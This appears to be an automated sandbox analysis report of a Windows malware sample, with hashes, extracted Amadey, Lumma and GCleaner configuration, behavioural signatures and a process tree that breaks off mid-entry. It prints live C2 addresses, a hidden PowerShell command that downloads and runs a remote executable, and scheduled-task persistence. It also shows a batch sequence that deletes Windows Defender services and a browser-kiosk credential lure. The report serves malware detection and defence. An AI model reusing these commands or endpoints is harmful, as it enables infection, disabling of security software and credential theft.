Analysis

  • max time kernel
    150s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250314-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system
  • submitted
    05/04/2025, 02:55

General

  • Target

    2025-04-05_57af71974244fa98ae419fbd38fac5c9_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe

  • Size

    938KB

  • MD5

    57af71974244fa98ae419fbd38fac5c9

  • SHA1

    9a23a4376204b13f33b0225d194e45c32cdeeff3

  • SHA256

    7409553ff5e0f6889fd526dbb5164ae90dd38221b4a2afa7a6a8be2734e4c431

  • SHA512

    343f14d6cad1095d0c490b1a9b066462c09a02969cb63c3185b629a74056bd51f440f4eba9b64bb42dc0e3647598da42f4a751821905d13684f5b35d21d25904

  • SSDEEP

    24576:dqDEvCTbMWu7rQYlBQcBiT6rprG8a4iu:dTvC/MTQYxsWR7a4i

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Family

amadey

Version

5.21

Botnet

092155

C2

http://176.113.115.6

Attributes
  • install_dir

    bb556cff4a

  • install_file

    rapes.exe

  • strings_key

    a131b127e996a898cd19ffb2d92e481b

  • url_paths

    /Ni9kiput/index.php

rc4.plain

Extracted

Family

gcleaner

C2

185.156.73.98

45.91.200.135

Extracted

Family

lumma

C2

https://pepperiop.digital/oage

https://jrxsafer.top/shpaoz

https://plantainklj.run/opafg

https://puerrogfh.live/iqwez

https://quavabvc.top/iuzhd

https://advennture.top/GKsiio

https://targett.top/dsANGt

https://rambutanvcx.run/adioz

https://ywmedici.top/noagis

https://cosmosyf.top/GOsznj

https://yjrxsafer.top/shpaoz

https://krxspint.digital/kendwz

https://rhxhube.run/pogrs

https://grxeasyw.digital/xxepw

https://xrfxcaseq.live/gspaz

https://gkrxspint.digital/kendwz

https://erhxhube.run/pogrs

https://6grxeasyw.digital/xxepw

https://28jrxsafer.top/shpaoz

https://kadvennture.top/GKsiio

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Amadey family
  • Detects Healer an antivirus disabler dropper 3 IoCs
  • Detects MeshAgent payload 1 IoCs
  • GCleaner

    GCleaner is a Pay-Per-Install malware loader first discovered in early 2019.

  • Gcleaner family
  • Healer

    Healer an antivirus disabler dropper.

  • Healer family
  • Lumma Stealer, LummaC

    Lumma or LummaC is an infostealer written in C++ first seen in August 2022.

  • Lumma family
  • MeshAgent

    MeshAgent is an open source remote access trojan written in C++.

  • Meshagent family
  • Modifies Windows Defender DisableAntiSpyware settings 3 TTPs 1 IoCs
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
  • Modifies Windows Defender TamperProtection settings 3 TTPs 1 IoCs
  • Modifies Windows Defender notification settings 3 TTPs 2 IoCs
  • Modifies security service 2 TTPs 2 IoCs
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 10 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs

    Run Powershell and hide display window.

  • Creates new service(s) 2 TTPs
  • Downloads MZ/PE file 21 IoCs
  • Possible privilege escalation attempt 2 IoCs
  • Sets service image path in registry 2 TTPs 1 IoCs
  • Stops running service(s) 4 TTPs
  • Checks BIOS information in registry 2 TTPs 22 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 7 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 33 IoCs
  • Identifies Wine through registry keys 2 TTPs 10 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Modifies file permissions 1 TTPs 2 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Windows security modification 2 TTPs 2 IoCs
  • Adds Run key to start application 2 TTPs 6 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs

    Bootkits write to the MBR to gain persistence at a level below the operating system.

  • AutoIT Executable 1 IoCs

    AutoIT scripts compiled to PE executables.

  • Drops file in System32 directory 64 IoCs
  • Enumerates processes with tasklist 1 TTPs 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 10 IoCs
  • Suspicious use of SetThreadContext 5 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 6 IoCs
  • Launches sc.exe 38 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 59 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 18 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 2 IoCs
  • Kills process with taskkill 5 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 1 IoCs
  • Runs net.exe
  • Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 2 IoCs
  • Suspicious behavior: MapViewOfSection 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 19 IoCs
  • Suspicious use of FindShellTrayWindow 35 IoCs
  • Suspicious use of SendNotifyMessage 29 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\2025-04-05_57af71974244fa98ae419fbd38fac5c9_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
    "C:\Users\Admin\AppData\Local\Temp\2025-04-05_57af71974244fa98ae419fbd38fac5c9_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe"
    1⤵
    • System Location Discovery: System Language Discovery
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:2216
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c schtasks /create /tn RrIGcmaRmMJ /tr "mshta C:\Users\Admin\AppData\Local\Temp\DONwvoWbB.hta" /sc minute /mo 25 /ru "Admin" /f
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:6064
      • C:\Windows\SysWOW64\schtasks.exe
        schtasks /create /tn RrIGcmaRmMJ /tr "mshta C:\Users\Admin\AppData\Local\Temp\DONwvoWbB.hta" /sc minute /mo 25 /ru "Admin" /f
        3⤵
        • System Location Discovery: System Language Discovery
        • Scheduled Task/Job: Scheduled Task
        PID:5108
    • C:\Windows\SysWOW64\mshta.exe
      mshta C:\Users\Admin\AppData\Local\Temp\DONwvoWbB.hta
      2⤵
      • Checks computer location settings
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:5484
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'RW4Q2TSRQGDNNDKSS1HZELL8TUBQAFEB.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Downloads MZ/PE file
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2652
        • C:\Users\Admin\AppData\Local\TempRW4Q2TSRQGDNNDKSS1HZELL8TUBQAFEB.EXE
          "C:\Users\Admin\AppData\Local\TempRW4Q2TSRQGDNNDKSS1HZELL8TUBQAFEB.EXE"
          4⤵
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Checks BIOS information in registry
          • Checks computer location settings
          • Executes dropped EXE
          • Identifies Wine through registry keys
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Drops file in Windows directory
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of WriteProcessMemory
          PID:3428
          • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
            "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
            5⤵
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Downloads MZ/PE file
            • Checks BIOS information in registry
            • Checks computer location settings
            • Executes dropped EXE
            • Identifies Wine through registry keys
            • Adds Run key to start application
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • System Location Discovery: System Language Discovery
            • Modifies registry class
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of WriteProcessMemory
            PID:6124
            • C:\Users\Admin\AppData\Local\Temp\10455080101\apple.exe
              "C:\Users\Admin\AppData\Local\Temp\10455080101\apple.exe"
              6⤵
              • Checks computer location settings
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:2020
              • C:\Users\Admin\AppData\Local\Temp\272.exe
                "C:\Users\Admin\AppData\Local\Temp\272.exe"
                7⤵
                • Checks computer location settings
                • Executes dropped EXE
                • System Location Discovery: System Language Discovery
                • Suspicious use of WriteProcessMemory
                PID:3328
                • C:\Windows\system32\cmd.exe
                  "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\82BD.tmp\82BE.tmp\82BF.bat C:\Users\Admin\AppData\Local\Temp\272.exe"
                  8⤵
                  • Suspicious use of WriteProcessMemory
                  PID:3152
                  • C:\Users\Admin\AppData\Local\Temp\272.exe
                    "C:\Users\Admin\AppData\Local\Temp\272.exe" go
                    9⤵
                    • Checks computer location settings
                    • Executes dropped EXE
                    • System Location Discovery: System Language Discovery
                    • Suspicious use of WriteProcessMemory
                    PID:2436
                    • C:\Windows\system32\cmd.exe
                      "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\83C6.tmp\83C7.tmp\83C8.bat C:\Users\Admin\AppData\Local\Temp\272.exe go"
                      10⤵
                      • Drops file in Program Files directory
                      • Suspicious use of WriteProcessMemory
                      PID:2148
                      • C:\Windows\system32\sc.exe
                        sc create ddrver type= kernel binPath= "C:\Users\Admin\AppData\Local\Temp\ssisd.sys"
                        11⤵
                        • Launches sc.exe
                        PID:1748
                      • C:\Windows\system32\sc.exe
                        sc start ddrver
                        11⤵
                        • Launches sc.exe
                        PID:1728
                      • C:\Windows\system32\timeout.exe
                        timeout /t 1
                        11⤵
                        • Delays execution with timeout.exe
                        PID:432
                      • C:\Windows\system32\sc.exe
                        sc stop ddrver
                        11⤵
                        • Launches sc.exe
                        PID:6120
                      • C:\Windows\system32\sc.exe
                        sc start ddrver
                        11⤵
                        • Launches sc.exe
                        PID:920
                      • C:\Windows\system32\takeown.exe
                        takeown /f "C:\ProgramData\Microsoft\Windows Defender" /r /d y
                        11⤵
                        • Possible privilege escalation attempt
                        • Modifies file permissions
                        PID:1856
                      • C:\Windows\system32\icacls.exe
                        icacls "C:\ProgramData\Microsoft\Windows Defender" /grant administrators:F /t
                        11⤵
                        • Possible privilege escalation attempt
                        • Modifies file permissions
                        PID:5156
                      • C:\Windows\system32\sc.exe
                        sc stop "WinDefend"
                        11⤵
                        • Launches sc.exe
                        PID:5236
                      • C:\Windows\system32\sc.exe
                        sc delete "WinDefend"
                        11⤵
                        • Launches sc.exe
                        PID:3212
                      • C:\Windows\system32\reg.exe
                        reg delete "HKLM\System\CurrentControlset\Services\WinDefend" /f
                        11⤵
                          PID:368
                        • C:\Windows\system32\sc.exe
                          sc stop "MDCoreSvc"
                          11⤵
                          • Launches sc.exe
                          PID:392
                        • C:\Windows\system32\sc.exe
                          sc delete "MDCoreSvc"
                          11⤵
                          • Launches sc.exe
                          PID:2956
                        • C:\Windows\system32\reg.exe
                          reg delete "HKLM\System\CurrentControlset\Services\MDCoreSvc" /f
                          11⤵
                            PID:804
                          • C:\Windows\system32\sc.exe
                            sc stop "WdNisSvc"
                            11⤵
                            • Launches sc.exe
                            PID:4380
                          • C:\Windows\system32\sc.exe
                            sc delete "WdNisSvc"
                            11⤵
                            • Launches sc.exe
                            PID:5244
                          • C:\Windows\system32\reg.exe
                            reg delete "HKLM\System\CurrentControlset\Services\WdNisSvc" /f
                            11⤵
                              PID:2240
                            • C:\Windows\system32\sc.exe
                              sc stop "Sense"
                              11⤵
                              • Launches sc.exe
                              PID:4316
                            • C:\Windows\system32\sc.exe
                              sc delete "Sense"
                              11⤵
                              • Launches sc.exe
                              PID:5112
                            • C:\Windows\system32\reg.exe
                              reg delete "HKLM\System\CurrentControlset\Services\Sense" /f
                              11⤵
                                PID:3876
                              • C:\Windows\system32\sc.exe
                                sc stop "wscsvc"
                                11⤵
                                • Launches sc.exe
                                PID:5388
                              • C:\Windows\system32\sc.exe
                                sc delete "wscsvc"
                                11⤵
                                • Launches sc.exe
                                PID:4280
                              • C:\Windows\system32\reg.exe
                                reg delete "HKLM\System\CurrentControlset\Services\wscsvc" /f
                                11⤵
                                • Modifies security service
                                PID:4260
                              • C:\Windows\system32\sc.exe
                                sc stop "SgrmBroker"
                                11⤵
                                • Launches sc.exe
                                PID:3304
                              • C:\Windows\system32\sc.exe
                                sc delete "SgrmBroker"
                                11⤵
                                • Launches sc.exe
                                PID:2216
                              • C:\Windows\system32\reg.exe
                                reg delete "HKLM\System\CurrentControlset\Services\SgrmBroker" /f
                                11⤵
                                  PID:4992
                                • C:\Windows\system32\sc.exe
                                  sc stop "SecurityHealthService"
                                  11⤵
                                  • Launches sc.exe
                                  PID:2252
                                • C:\Windows\system32\sc.exe
                                  sc delete "SecurityHealthService"
                                  11⤵
                                  • Launches sc.exe
                                  PID:6064
                                • C:\Windows\system32\reg.exe
                                  reg delete "HKLM\System\CurrentControlset\Services\SecurityHealthService" /f
                                  11⤵
                                    PID:5488
                                  • C:\Windows\system32\sc.exe
                                    sc stop "webthreatdefsvc"
                                    11⤵
                                    • Launches sc.exe
                                    PID:5312
                                  • C:\Windows\system32\sc.exe
                                    sc delete "webthreatdefsvc"
                                    11⤵
                                    • Launches sc.exe
                                    PID:216
                                  • C:\Windows\system32\reg.exe
                                    reg delete "HKLM\System\CurrentControlset\Services\webthreatdefsvc" /f
                                    11⤵
                                      PID:4620
                                    • C:\Windows\system32\sc.exe
                                      sc stop "webthreatdefusersvc"
                                      11⤵
                                      • Launches sc.exe
                                      PID:2388
                                    • C:\Windows\system32\sc.exe
                                      sc delete "webthreatdefusersvc"
                                      11⤵
                                      • Launches sc.exe
                                      PID:4852
                                    • C:\Windows\system32\reg.exe
                                      reg delete "HKLM\System\CurrentControlset\Services\webthreatdefusersvc" /f
                                      11⤵
                                        PID:4900
                                      • C:\Windows\system32\sc.exe
                                        sc stop "WdNisDrv"
                                        11⤵
                                        • Launches sc.exe
                                        PID:4856
                                      • C:\Windows\system32\sc.exe
                                        sc delete "WdNisDrv"
                                        11⤵
                                        • Launches sc.exe
                                        PID:4680
                                      • C:\Windows\system32\reg.exe
                                        reg delete "HKLM\System\CurrentControlset\Services\WdNisDrv" /f
                                        11⤵
                                          PID:5356
                                        • C:\Windows\system32\sc.exe
                                          sc stop "WdBoot"
                                          11⤵
                                          • Launches sc.exe
                                          PID:3180
                                        • C:\Windows\system32\sc.exe
                                          sc delete "WdBoot"
                                          11⤵
                                          • Launches sc.exe
                                          PID:4996
                                        • C:\Windows\system32\reg.exe
                                          reg delete "HKLM\System\CurrentControlset\Services\WdBoot" /f
                                          11⤵
                                            PID:116
                                          • C:\Windows\system32\sc.exe
                                            sc stop "WdFilter"
                                            11⤵
                                            • Launches sc.exe
                                            PID:1780
                                          • C:\Windows\system32\sc.exe
                                            sc delete "WdFilter"
                                            11⤵
                                            • Launches sc.exe
                                            PID:1236
                                          • C:\Windows\system32\reg.exe
                                            reg delete "HKLM\System\CurrentControlset\Services\WdFilter" /f
                                            11⤵
                                              PID:4936
                                            • C:\Windows\system32\sc.exe
                                              sc stop "SgrmAgent"
                                              11⤵
                                              • Launches sc.exe
                                              PID:5992
                                            • C:\Windows\system32\sc.exe
                                              sc delete "SgrmAgent"
                                              11⤵
                                              • Launches sc.exe
                                              PID:3748
                                            • C:\Windows\system32\reg.exe
                                              reg delete "HKLM\System\CurrentControlset\Services\SgrmAgent" /f
                                              11⤵
                                                PID:4452
                                              • C:\Windows\system32\sc.exe
                                                sc stop "MsSecWfp"
                                                11⤵
                                                • Launches sc.exe
                                                PID:2092
                                              • C:\Windows\system32\sc.exe
                                                sc delete "MsSecWfp"
                                                11⤵
                                                • Launches sc.exe
                                                PID:4652
                                              • C:\Windows\system32\reg.exe
                                                reg delete "HKLM\System\CurrentControlset\Services\MsSecWfp" /f
                                                11⤵
                                                  PID:4776
                                                • C:\Windows\system32\sc.exe
                                                  sc stop "MsSecFlt"
                                                  11⤵
                                                  • Launches sc.exe
                                                  PID:4292
                                                • C:\Windows\system32\sc.exe
                                                  sc delete "MsSecFlt"
                                                  11⤵
                                                  • Launches sc.exe
                                                  PID:2900
                                                • C:\Windows\system32\reg.exe
                                                  reg delete "HKLM\System\CurrentControlset\Services\MsSecFlt" /f
                                                  11⤵
                                                    PID:4720
                                                  • C:\Windows\system32\sc.exe
                                                    sc stop "MsSecCore"
                                                    11⤵
                                                    • Launches sc.exe
                                                    PID:2412
                                                  • C:\Windows\system32\sc.exe
                                                    sc delete "MsSecCore"
                                                    11⤵
                                                    • Launches sc.exe
                                                    PID:4676
                                                  • C:\Windows\system32\reg.exe
                                                    reg delete "HKLM\System\CurrentControlset\Services\MsSecCore" /f
                                                    11⤵
                                                      PID:3760
                                                    • C:\Windows\system32\schtasks.exe
                                                      schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /f
                                                      11⤵
                                                        PID:5836
                                                      • C:\Windows\system32\schtasks.exe
                                                        schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /f
                                                        11⤵
                                                          PID:5516
                                                        • C:\Windows\system32\schtasks.exe
                                                          schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /f
                                                          11⤵
                                                            PID:1500
                                                          • C:\Windows\system32\schtasks.exe
                                                            schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /f
                                                            11⤵
                                                              PID:3288
                                                            • C:\Windows\system32\sc.exe
                                                              sc stop ddrver
                                                              11⤵
                                                              • Launches sc.exe
                                                              PID:3636
                                                            • C:\Windows\system32\sc.exe
                                                              sc delete ddrver
                                                              11⤵
                                                              • Launches sc.exe
                                                              PID:1460
                                                  • C:\Users\Admin\AppData\Local\Temp\10455420101\0BiRjfE.exe
                                                    "C:\Users\Admin\AppData\Local\Temp\10455420101\0BiRjfE.exe"
                                                    6⤵
                                                    • Executes dropped EXE
                                                    • System Location Discovery: System Language Discovery
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:2812
                                                  • C:\Users\Admin\AppData\Local\Temp\10455890101\ba83eb8474.exe
                                                    "C:\Users\Admin\AppData\Local\Temp\10455890101\ba83eb8474.exe"
                                                    6⤵
                                                    • Executes dropped EXE
                                                    • Suspicious use of SetThreadContext
                                                    • System Location Discovery: System Language Discovery
                                                    PID:4740
                                                    • C:\Users\Admin\AppData\Local\Temp\svchost015.exe
                                                      "C:\Users\Admin\AppData\Local\Temp\10455890101\ba83eb8474.exe"
                                                      7⤵
                                                      • Downloads MZ/PE file
                                                      • Executes dropped EXE
                                                      • System Location Discovery: System Language Discovery
                                                      PID:384
                                                  • C:\Users\Admin\AppData\Local\Temp\10455900101\c46a8a82c7.exe
                                                    "C:\Users\Admin\AppData\Local\Temp\10455900101\c46a8a82c7.exe"
                                                    6⤵
                                                    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                    • Checks BIOS information in registry
                                                    • Executes dropped EXE
                                                    • Identifies Wine through registry keys
                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                    • Suspicious use of SetThreadContext
                                                    • System Location Discovery: System Language Discovery
                                                    • Suspicious behavior: EnumeratesProcesses
                                                    PID:2020
                                                    • C:\Users\Admin\AppData\Local\Temp\svchost015.exe
                                                      "C:\Users\Admin\AppData\Local\Temp\10455900101\c46a8a82c7.exe"
                                                      7⤵
                                                      • Downloads MZ/PE file
                                                      • Executes dropped EXE
                                                      • System Location Discovery: System Language Discovery
                                                      PID:1748
                                                  • C:\Users\Admin\AppData\Local\Temp\10455910101\7d2959d19c.exe
                                                    "C:\Users\Admin\AppData\Local\Temp\10455910101\7d2959d19c.exe"
                                                    6⤵
                                                    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                    • Checks BIOS information in registry
                                                    • Executes dropped EXE
                                                    • Identifies Wine through registry keys
                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                    • System Location Discovery: System Language Discovery
                                                    • Suspicious behavior: EnumeratesProcesses
                                                    PID:6088
                                                  • C:\Users\Admin\AppData\Local\Temp\10455920101\28554feffe.exe
                                                    "C:\Users\Admin\AppData\Local\Temp\10455920101\28554feffe.exe"
                                                    6⤵
                                                    • Checks BIOS information in registry
                                                    • Executes dropped EXE
                                                    PID:5492
                                                  • C:\Users\Admin\AppData\Local\Temp\10455930101\f0df259dd9.exe
                                                    "C:\Users\Admin\AppData\Local\Temp\10455930101\f0df259dd9.exe"
                                                    6⤵
                                                    • Executes dropped EXE
                                                    • System Location Discovery: System Language Discovery
                                                    • Suspicious behavior: EnumeratesProcesses
                                                    • Suspicious use of FindShellTrayWindow
                                                    • Suspicious use of SendNotifyMessage
                                                    PID:5992
                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                      taskkill /F /IM firefox.exe /T
                                                      7⤵
                                                      • System Location Discovery: System Language Discovery
                                                      • Kills process with taskkill
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:4468
                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                      taskkill /F /IM chrome.exe /T
                                                      7⤵
                                                      • System Location Discovery: System Language Discovery
                                                      • Kills process with taskkill
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:5860
                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                      taskkill /F /IM msedge.exe /T
                                                      7⤵
                                                      • System Location Discovery: System Language Discovery
                                                      • Kills process with taskkill
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:3812
                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                      taskkill /F /IM opera.exe /T
                                                      7⤵
                                                      • System Location Discovery: System Language Discovery
                                                      • Kills process with taskkill
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:3912
                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                      taskkill /F /IM brave.exe /T
                                                      7⤵
                                                      • System Location Discovery: System Language Discovery
                                                      • Kills process with taskkill
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:2436
                                                    • C:\Program Files\Mozilla Firefox\firefox.exe
                                                      "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
                                                      7⤵
                                                        PID:1820
                                                        • C:\Program Files\Mozilla Firefox\firefox.exe
                                                          "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
                                                          8⤵
                                                          • Checks processor information in registry
                                                          • Suspicious use of AdjustPrivilegeToken
                                                          • Suspicious use of FindShellTrayWindow
                                                          • Suspicious use of SendNotifyMessage
                                                          • Suspicious use of SetWindowsHookEx
                                                          PID:3160
                                                          • C:\Program Files\Mozilla Firefox\firefox.exe
                                                            "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 2008 -prefsLen 27099 -prefMapHandle 2012 -prefMapSize 270279 -ipcHandle 2088 -initialChannelId {364da2be-2c58-43dc-8352-815ccadd6675} -parentPid 3160 -crashReporter "\\.\pipe\gecko-crash-server-pipe.3160" -appDir "C:\Program Files\Mozilla Firefox\browser" - 1 gpu
                                                            9⤵
                                                              PID:3428
                                                            • C:\Program Files\Mozilla Firefox\firefox.exe
                                                              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 2476 -prefsLen 27135 -prefMapHandle 2480 -prefMapSize 270279 -ipcHandle 2504 -initialChannelId {0ca95ad6-1d35-4f92-8157-e935a63b88ae} -parentPid 3160 -crashReporter "\\.\pipe\gecko-crash-server-pipe.3160" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 2 socket
                                                              9⤵
                                                                PID:948
                                                              • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 3636 -prefsLen 25164 -prefMapHandle 3640 -prefMapSize 270279 -jsInitHandle 3644 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 3652 -initialChannelId {efc5511c-722d-4152-a2e5-7e8115c0525e} -parentPid 3160 -crashReporter "\\.\pipe\gecko-crash-server-pipe.3160" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 3 tab
                                                                9⤵
                                                                • Checks processor information in registry
                                                                PID:4908
                                                              • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 3804 -prefsLen 27276 -prefMapHandle 3808 -prefMapSize 270279 -ipcHandle 3908 -initialChannelId {d63d75c8-8700-4352-935e-1cb4437c05ec} -parentPid 3160 -crashReporter "\\.\pipe\gecko-crash-server-pipe.3160" -appDir "C:\Program Files\Mozilla Firefox\browser" - 4 rdd
                                                                9⤵
                                                                  PID:3932
                                                                • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 4392 -prefsLen 34775 -prefMapHandle 4396 -prefMapSize 270279 -jsInitHandle 4400 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 4408 -initialChannelId {cecec40d-cb30-4f4a-b0dc-b7a33b57ecdc} -parentPid 3160 -crashReporter "\\.\pipe\gecko-crash-server-pipe.3160" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 5 tab
                                                                  9⤵
                                                                  • Checks processor information in registry
                                                                  PID:1380
                                                                • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -sandboxingKind 0 -prefsHandle 5036 -prefsLen 35012 -prefMapHandle 5040 -prefMapSize 270279 -ipcHandle 5048 -initialChannelId {d54bc997-180b-4bbe-8fdf-a1c32fcc3645} -parentPid 3160 -crashReporter "\\.\pipe\gecko-crash-server-pipe.3160" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 6 utility
                                                                  9⤵
                                                                  • Checks processor information in registry
                                                                  PID:6192
                                                                • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5376 -prefsLen 32952 -prefMapHandle 5380 -prefMapSize 270279 -jsInitHandle 5384 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5392 -initialChannelId {14c907ab-2e70-4dac-85ff-54a09a666147} -parentPid 3160 -crashReporter "\\.\pipe\gecko-crash-server-pipe.3160" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 7 tab
                                                                  9⤵
                                                                  • Checks processor information in registry
                                                                  PID:6268
                                                                • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5572 -prefsLen 32952 -prefMapHandle 5576 -prefMapSize 270279 -jsInitHandle 5580 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5588 -initialChannelId {f5db993c-06b0-464c-b93c-d5af76c1b6b0} -parentPid 3160 -crashReporter "\\.\pipe\gecko-crash-server-pipe.3160" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 8 tab
                                                                  9⤵
                                                                  • Checks processor information in registry
                                                                  PID:6292
                                                                • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5804 -prefsLen 32952 -prefMapHandle 5800 -prefMapSize 270279 -jsInitHandle 5412 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 4652 -initialChannelId {2161448d-73d7-4729-a273-c75d468f806d} -parentPid 3160 -crashReporter "\\.\pipe\gecko-crash-server-pipe.3160" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 9 tab
                                                                  9⤵
                                                                  • Checks processor information in registry
                                                                  PID:6332
                                                          • C:\Users\Admin\AppData\Local\Temp\10455940101\6984f58e7c.exe
                                                            "C:\Users\Admin\AppData\Local\Temp\10455940101\6984f58e7c.exe"
                                                            6⤵
                                                            • Modifies Windows Defender DisableAntiSpyware settings
                                                            • Modifies Windows Defender Real-time Protection settings
                                                            • Modifies Windows Defender TamperProtection settings
